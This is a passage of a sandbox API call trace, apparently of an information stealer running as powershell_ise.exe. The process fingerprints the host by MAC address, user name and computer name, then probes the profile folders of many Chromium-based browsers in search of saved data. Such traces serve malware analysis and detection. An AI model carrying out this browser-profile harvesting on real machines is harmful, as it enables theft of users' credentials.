bInitialState=0, lpName=0x0) returned 0x46c [0178.835] SetEvent (hEvent=0x3b4) returned 1 [0178.835] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x19f3a0*=0x46c, lpdwindex=0x19f1bc | out: lpdwindex=0x19f1bc) returned 0x0 [0178.838] CoGetContextToken (in: pToken=0x19f270 | out: pToken=0x19f270) returned 0x0 [0178.838] CoGetContextToken (in: pToken=0x19f1d0 | out: pToken=0x19f1d0) returned 0x0 [0178.838] WbemDefPath:IUnknown:QueryInterface (in: This=0x5943c0, riid=0x19f2a0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f29c | out: ppvObject=0x19f29c*=0x5943c0) returned 0x0 [0178.838] WbemDefPath:IUnknown:AddRef (This=0x5943c0) returned 0x3 [0178.838] WbemDefPath:IUnknown:Release (This=0x5943c0) returned 0x2 [0178.838] WbemDefPath:IWbemPath:SetText (This=0x5943c0, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=4") returned 0x0 [0178.838] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594200, puCount=0x19f420 | out: puCount=0x19f420*=0x2) returned 0x0 [0178.838] WbemDefPath:IWbemPath:GetText (in: This=0x594200, lFlags=4, puBuffLength=0x19f41c*=0x0, pszText=0x0 | out: puBuffLength=0x19f41c*=0xf, pszText=0x0) returned 0x0 [0178.838] WbemDefPath:IWbemPath:GetText (in: This=0x594200, lFlags=4, puBuffLength=0x19f41c*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f41c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0178.838] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594200, puCount=0x19f3ec | out: puCount=0x19f3ec*=0x2) returned 0x0 [0178.838] WbemDefPath:IWbemPath:GetText (in: This=0x594200, lFlags=4, puBuffLength=0x19f3e8*=0x0, pszText=0x0 | out: puBuffLength=0x19f3e8*=0xf, pszText=0x0) returned 0x0 [0178.838] WbemDefPath:IWbemPath:GetText (in: This=0x594200, lFlags=4, puBuffLength=0x19f3e8*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f3e8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0178.838] IWbemClassObject:Get (in: This=0x576410, wszName="IPEnabled", lFlags=0, pVal=0x19f3e8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x22fe22c*=0, plFlavor=0x22fe230*=0 | out: pVal=0x19f3e8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pType=0x22fe22c*=11, plFlavor=0x22fe230*=0) returned 0x0 [0178.838] IWbemClassObject:Get (in: This=0x576410, wszName="IPEnabled", lFlags=0, pVal=0x19f3f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x22fe22c*=11, plFlavor=0x22fe230*=0 | out: pVal=0x19f3f0*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pType=0x22fe22c*=11, plFlavor=0x22fe230*=0) returned 0x0 [0178.841] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594200, puCount=0x19f3ec | out: puCount=0x19f3ec*=0x2) returned 0x0 [0178.841] WbemDefPath:IWbemPath:GetText (in: This=0x594200, lFlags=4, puBuffLength=0x19f3e8*=0x0, pszText=0x0 | out: puBuffLength=0x19f3e8*=0xf, pszText=0x0) returned 0x0 [0178.841] WbemDefPath:IWbemPath:GetText (in: This=0x594200, lFlags=4, puBuffLength=0x19f3e8*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f3e8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0178.841] IWbemClassObject:Get (in: This=0x576410, wszName="MacAddress", lFlags=0, pVal=0x19f3e8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x22fe2c8*=0, plFlavor=0x22fe2cc*=0 | out: pVal=0x19f3e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="00:14:C6:42:F0:09", varVal2=0x0), pType=0x22fe2c8*=8, plFlavor=0x22fe2cc*=0) returned 0x0 [0178.841] SysStringByteLen (bstr="00:14:C6:42:F0:09") returned 0x22 [0178.841] SysStringByteLen (bstr="00:14:C6:42:F0:09") returned 0x22 [0178.841] IWbemClassObject:Get (in: This=0x576410, wszName="MacAddress", lFlags=0, pVal=0x19f3f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x22fe2c8*=8, plFlavor=0x22fe2cc*=0 | out: pVal=0x19f3f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="00:14:C6:42:F0:09", varVal2=0x0), pType=0x22fe2c8*=8, plFlavor=0x22fe2cc*=0) returned 0x0 [0178.841] SysStringByteLen (bstr="00:14:C6:42:F0:09") returned 0x22 [0178.841] SysStringByteLen (bstr="00:14:C6:42:F0:09") returned 0x22 [0178.841] IUnknown:Release (This=0x576410) returned 0x2 [0178.841] CoTaskMemAlloc (cb=0x4) returned 0x596eb8 [0178.841] IEnumWbemClassObject:Next (in: This=0x59a690, lTimeout=-1, uCount=0x1, apObjects=0x596eb8, puReturned=0x22fb57c | out: apObjects=0x596eb8*=0x0, puReturned=0x22fb57c*=0x0) returned 0x1 [0178.842] CoTaskMemFree (pv=0x596eb8) [0178.842] CoGetContextToken (in: pToken=0x19f318 | out: pToken=0x19f318) returned 0x0 [0178.842] WbemLocator:IUnknown:Release (This=0x5b0b30) returned 0x1 [0178.842] IUnknown:Release (This=0x59a690) returned 0x0 [0178.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe", nBufferLength=0x105, lpBuffer=0x19eef4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe", lpFilePart=0x0) returned 0x3d [0178.879] GetEnvironmentVariableW (in: lpName="%startupfolder%", lpBuffer=0x19f354, nSize=0x80 | out: lpBuffer="") returned 0x0 [0178.891] GetUserNameW (in: lpBuffer=0x19f254, pcbBuffer=0x22ff2ec | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x22ff2ec) returned 1 [0178.896] GetComputerNameW (in: lpBuffer=0x19f254, nSize=0x22ff768 | out: lpBuffer="XC64ZB", nSize=0x22ff768) returned 1 [0178.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe.Config", nBufferLength=0x105, lpBuffer=0x19ee60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe.Config", lpFilePart=0x0) returned 0x44 [0178.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x19edb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0178.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x19ed7c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0178.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x19ede0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0178.929] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f288) returned 1 [0178.929] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x19f304 | out: lpFileInformation=0x19f304*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56a29ff, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97df7583, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97df7583, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0178.929] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f284) returned 1 [0178.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x19ed2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0178.929] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f264) returned 1 [0178.930] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x474 [0178.930] GetFileType (hFile=0x474) returned 0x1 [0178.930] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f260) returned 1 [0178.930] GetFileType (hFile=0x474) returned 0x1 [0178.933] GetFileSize (in: hFile=0x474, lpFileSizeHigh=0x19f290 | out: lpFileSizeHigh=0x19f290*=0x0) returned 0x8c8f [0178.933] ReadFile (in: hFile=0x474, lpBuffer=0x2300b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f24c, lpOverlapped=0x0 | out: lpBuffer=0x2300b2c*, lpNumberOfBytesRead=0x19f24c*=0x1000, lpOverlapped=0x0) returned 1 [0178.935] ReadFile (in: hFile=0x474, lpBuffer=0x2300b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f200, lpOverlapped=0x0 | out: lpBuffer=0x2300b2c*, lpNumberOfBytesRead=0x19f200*=0x1000, lpOverlapped=0x0) returned 1 [0178.935] ReadFile (in: hFile=0x474, lpBuffer=0x2300b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f17c, lpOverlapped=0x0 | out: lpBuffer=0x2300b2c*, lpNumberOfBytesRead=0x19f17c*=0x1000, lpOverlapped=0x0) returned 1 [0178.935] ReadFile (in: hFile=0x474, lpBuffer=0x2300b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f17c, lpOverlapped=0x0 | out: lpBuffer=0x2300b2c*, lpNumberOfBytesRead=0x19f17c*=0x1000, lpOverlapped=0x0) returned 1 [0178.935] ReadFile (in: hFile=0x474, lpBuffer=0x2300b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f17c, lpOverlapped=0x0 | out: lpBuffer=0x2300b2c*, lpNumberOfBytesRead=0x19f17c*=0x1000, lpOverlapped=0x0) returned 1 [0178.935] ReadFile (in: hFile=0x474, lpBuffer=0x2300b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f17c, lpOverlapped=0x0 | out: lpBuffer=0x2300b2c*, lpNumberOfBytesRead=0x19f17c*=0x1000, lpOverlapped=0x0) returned 1 [0178.935] ReadFile (in: hFile=0x474, lpBuffer=0x2300b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f1fc, lpOverlapped=0x0 | out: lpBuffer=0x2300b2c*, lpNumberOfBytesRead=0x19f1fc*=0x1000, lpOverlapped=0x0) returned 1 [0178.936] ReadFile (in: hFile=0x474, lpBuffer=0x2300b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f17c, lpOverlapped=0x0 | out: lpBuffer=0x2300b2c*, lpNumberOfBytesRead=0x19f17c*=0x1000, lpOverlapped=0x0) returned 1 [0178.936] ReadFile (in: hFile=0x474, lpBuffer=0x2300b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f17c, lpOverlapped=0x0 | out: lpBuffer=0x2300b2c*, lpNumberOfBytesRead=0x19f17c*=0xc8f, lpOverlapped=0x0) returned 1 [0178.936] ReadFile (in: hFile=0x474, lpBuffer=0x2300b2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f224, lpOverlapped=0x0 | out: lpBuffer=0x2300b2c*, lpNumberOfBytesRead=0x19f224*=0x0, lpOverlapped=0x0) returned 1 [0178.936] CloseHandle (hObject=0x474) returned 1 [0178.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe.Config", nBufferLength=0x105, lpBuffer=0x19ed78, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe.Config", lpFilePart=0x0) returned 0x44 [0178.937] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe.Config", nBufferLength=0x105, lpBuffer=0x19eddc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe.Config", lpFilePart=0x0) returned 0x44 [0178.937] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f284) returned 1 [0178.937] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe.Config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell_ise.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x19f300 | out: lpFileInformation=0x19f300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f066aa8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f066aa8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f066aa8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcc)) returned 1 [0178.937] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f280) returned 1 [0178.937] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe.Config", nBufferLength=0x105, lpBuffer=0x19ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe.Config", lpFilePart=0x0) returned 0x44 [0178.937] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f260) returned 1 [0178.937] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe.Config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell_ise.exe.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x474 [0178.937] GetFileType (hFile=0x474) returned 0x1 [0178.937] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f25c) returned 1 [0178.937] GetFileType (hFile=0x474) returned 0x1 [0178.937] GetFileSize (in: hFile=0x474, lpFileSizeHigh=0x19f28c | out: lpFileSizeHigh=0x19f28c*=0x0) returned 0xcc [0178.938] ReadFile (in: hFile=0x474, lpBuffer=0x23074a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f248, lpOverlapped=0x0 | out: lpBuffer=0x23074a8*, lpNumberOfBytesRead=0x19f248*=0xcc, lpOverlapped=0x0) returned 1 [0178.938] ReadFile (in: hFile=0x474, lpBuffer=0x23074a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x23074a8*, lpNumberOfBytesRead=0x19f220*=0x0, lpOverlapped=0x0) returned 1 [0178.938] CloseHandle (hObject=0x474) returned 1 [0179.027] QueryUnbiasedInterruptTime (in: UnbiasedTime=0x19f400 | out: UnbiasedTime=0x19f400) returned 1 [0179.033] QueryUnbiasedInterruptTime (in: UnbiasedTime=0x19f3f0 | out: UnbiasedTime=0x19f3f0) returned 1 [0179.033] QueryUnbiasedInterruptTime (in: UnbiasedTime=0x19f420 | out: UnbiasedTime=0x19f420) returned 1 [0179.033] QueryUnbiasedInterruptTime (in: UnbiasedTime=0x19f410 | out: UnbiasedTime=0x19f410) returned 1 [0179.244] CoTaskMemAlloc (cb=0x20c) returned 0x5d4f50 [0179.244] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x5d4f50 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0179.246] CoTaskMemFree (pv=0x5d4f50) [0179.246] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x19eaf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0179.292] CoTaskMemAlloc (cb=0x20c) returned 0x5d59f8 [0179.293] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5d59f8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0179.293] CoTaskMemFree (pv=0x5d59f8) [0179.293] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x19eaf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpFilePart=0x0) returned 0x25 [0179.862] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data", nBufferLength=0x105, lpBuffer=0x19eaf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data", lpFilePart=0x0) returned 0x3b [0179.863] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef9c) returned 1 [0179.863] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\coowon\\coowon\\user data"), fInfoLevelId=0x0, lpFileInformation=0x19f018 | out: lpFileInformation=0x19f018*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0179.863] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef98) returned 1 [0179.863] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data", nBufferLength=0x105, lpBuffer=0x19eaf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data", lpFilePart=0x0) returned 0x3c [0179.863] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef9c) returned 1 [0179.863] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\coccoc\\browser\\user data"), fInfoLevelId=0x0, lpFileInformation=0x19f018 | out: lpFileInformation=0x19f018*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0179.863] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef98) returned 1 [0179.863] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data", nBufferLength=0x105, lpBuffer=0x19eaf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data", lpFilePart=0x0) returned 0x3b [0179.863] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef9c) returned 1 [0179.864] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\comodo\\dragon\\user data"), fInfoLevelId=0x0, lpFileInformation=0x19f018 | out: lpFileInformation=0x19f018*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0179.864] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef98) returned 1 [0179.864] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data", nBufferLength=0x105, lpBuffer=0x19eaf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data", lpFilePart=0x0) returned 0x39 [0179.864] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef9c) returned 1 [0179.864] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\centbrowser\\user data"), fInfoLevelId=0x0, lpFileInformation=0x19f018 | out: lpFileInformation=0x19f018*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0179.864] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef98) returned 1 [0179.864] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data", nBufferLength=0x105, lpBuffer=0x19eaf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data", lpFilePart=0x0) returned 0x42 [0179.864] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef9c) returned 1 [0179.864] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\catalinagroup\\citrio\\user data"), fInfoLevelId=0x0, lpFileInformation=0x19f018 | out: lpFileInformation=0x19f018*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0179.864] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef98) returned 1 [0179.864] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data", nBufferLength=0x105, lpBuffer=0x19eaf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data", lpFilePart=0x0) returned 0x35 [0179.864] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef9c) returned 1 [0179.864] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\vivaldi\\user data"), fInfoLevelId=0x0, lpFileInformation=0x19f018 | out: lpFileInformation=0x19f018*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0179.864] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef98) returned 1 [0179.864] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data", nBufferLength=0x105, lpBuffer=0x19eaf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data", lpFilePart=0x0) returned 0x33 [0179.864] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef9c) returned 1 [0179.865] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\amigo\\user data"), fInfoLevelId=0x0, lpFileInformation=0x19f018 | out: lpFileInformation=0x19f018*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0179.865] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef98) returned 1 [0179.865] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data", nBufferLength=0x105, lpBuffer=0x19eaf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data", lpFilePart=0x0) returned 0x36 [0179.865] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef9c) returned 1 [0179.865] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\chromium\\user data"), fInfoLevelId=0x0, lpFileInformation=0x19f018 | out: lpFileInformation=0x19f018*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0179.865] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef98) returned 1 [0179.865] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer", nBufferLength=0x105, lpBuffer=0x19eaf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer", lpFilePart=0x0) returned 0x57 [0179.865] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef9c) returned 1 [0179.865] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\fenrir inc\\sleipnir5\\setting\\modules\\chromiumviewer"), fInfoLevelId=0x0, lpFileInformation=0x19f018 | out: lpFileInformation=0x19f018*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0179.865] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef98) returned 1 